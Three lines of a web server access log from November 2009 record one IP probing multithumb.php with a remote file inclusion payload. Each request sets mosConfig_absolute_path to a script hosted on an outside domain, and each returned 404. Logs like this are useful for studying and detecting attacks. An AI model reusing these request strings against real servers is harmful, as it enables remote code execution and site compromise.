77.221.130.17 - - [11/Nov/2009:20:57:34 -0600] "GET /logs/access_log.1252368000//multithumb.php?mosConfig_absolute_path=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.17 - - [11/Nov/2009:20:57:49 -0600] "GET /logs/access_log.1244332800//multithumb.php?mosConfig_absolute_path=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.17 - - [11/Nov/2009:20:57:49 -0600] "GET /logs/access_log.1252454400//multithumb.php?mosConfig_absolute_path=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
